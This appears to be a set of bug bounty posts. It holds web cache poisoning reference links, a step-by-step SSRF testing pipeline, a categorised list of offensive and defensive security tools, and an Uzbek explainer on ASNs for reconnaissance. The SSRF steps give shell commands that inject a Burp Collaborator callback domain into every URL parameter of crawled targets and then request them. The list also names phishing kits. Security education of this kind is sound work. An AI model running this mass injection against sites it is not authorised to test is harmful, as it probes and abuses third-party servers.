References —>
https://portswigger.net/web-security/web-cache-poisoning
https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
https://hackerone.com/reports/593712
https://youst.in/posts/cache-poisoning-at-scale/
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9

💰 Bug Bounty Tips for SSRF 💰

Step 1: Subdomain Enumeration

* DNS Dumpster
* Sublist3r
* Amass
* Certificate Transparency Logs
* subdomainer

Step 2: Find Live Domains

cat all-domains.txt | httpx > all-live.txt

Step 3: Identify All URLs

cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt

Step 4: Injection Burp Collabrator URL in Parameters

cat /home/user/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt

Step 5: Test for SSRF Vulnerabilities

cat ssrf.txt | httpx -fr

Step 6: How to check which URL is vulnerable

split -l 10 ssrf.txt output_file_

#BugBounty #Pentesting

💥 Cybersecurity Tools By Category

Information Gathering:
>Nmap
>Shodan
>Maltego
>TheHavester
>Recon-NG
>Amass
>Censys
>OSINT Framework
>Gobuster

Exploitation:
>Burp Suite
>Metasploit Framework
>SQL Map
>ZAP
>ExploitDB
>Core Impact
>Cobalt Strike

Password Cracking:
>John The Ripper
>Hydra
>Hashcat
>OPHCrack
>Medusa
>THC-Hydra
>Cain & Abel

Vulnerability Scanning:
>OpenVAS
>Nessus
>AppScan
>LYNIS
>Retina
>Nexpose

Software Engineering:
>GoPhish
>HiddenEye
>SocialFish
>EvilURL
>Evilginx

Forensics:
>SluethKit
>Autopsy
>Volatility
>Guymager
>Foremost
>Binwalk
>Wireshark

Wireless Hacking:
>Aircrack-NG
>Wifite
>Kismet
>TCPDump
>Airsnort
>Netstumbler
>Reaver

Web Application Assessment:
>OWASP ZAP
>Burp Suite
>Nikto
>ZAP
>WPScan
>Gobuster
>App Spider

ASN nima ?
ASN nega Bug Bountydagi muhim jarayonlardan biri hisoblanadi ?

Kimdir bu malumotlarning nima keragi bor deyishi mumkin buni keyingi postda yozib qoldiraman !

ASN - "avtonom tizim raqami"degan ma'noni anglatadi. Bu internetdagi avtonom tizimga (AC) tayinlangan noyob identifikator. Avtonom tizim-bu internetga umumiy marshrutlash siyosatini taqdim etadigan bitta tashkilot tomonidan boshqariladigan IP-tarmoqlar va marshrutizatorlar to'plami.

ASN — ning asosiy maqsadi internetdagi tarmoq trafigini yo'naltirishni osonlashtirishdir. Har bir ASN global miqyosda noyobdir va marshrutlash qarorlarini qabul qilish uchun chegara shlyuzi protokoli (BGP) tomonidan qo'llaniladi. BGP-bu internetdagi turli xil avtonom tizimlar o'rtasida marshrutlash va mavjudlik to'g'risida ma'lumot almashish uchun ishlatiladigan protokol.

ASN raqamlari arin (Amerika Internet raqamlari reestri), RIPE NCC (Réseaux IP Européens tarmoq muvofiqlashtirish markazi), APNIC (Osiyo-tinch okeani tarmoq axborot markazi) va boshqalar kabi mintaqaviy Internet registrlari (rir) tomonidan taqsimlanadi va boshqariladi. Tashkilot Internetga ulanganda, unga ASN raqami beriladi va bu raqam uni boshqa tarmoqlardan aniqlash va farqlash uchun ishlatiladi.

Shunday qilib, ASN — bu turli xil tarmoqlar o'rtasida Internet-trafik oqimini boshqarish va boshqarishda yordam beradigan avtonom tizim bilan bog'liq raqamli identifikator.

ASNlar juda katta tarmoqlarga beriladi. Ushbu ASN raqamlari bizga tashkilotning IT infratuzilmasini kuzatishga yordam beradi. Ularni olishning eng ishonchli usuli — Hurricane Electric Free form Search orqali hisoblanadi: https://bgp.he.net

Cloud infratuzilmaning paydo bo'lishi tufayli ASN har doim ham tarmoqning to'liq xaritasini bermaydi !

#BugBounty #Recon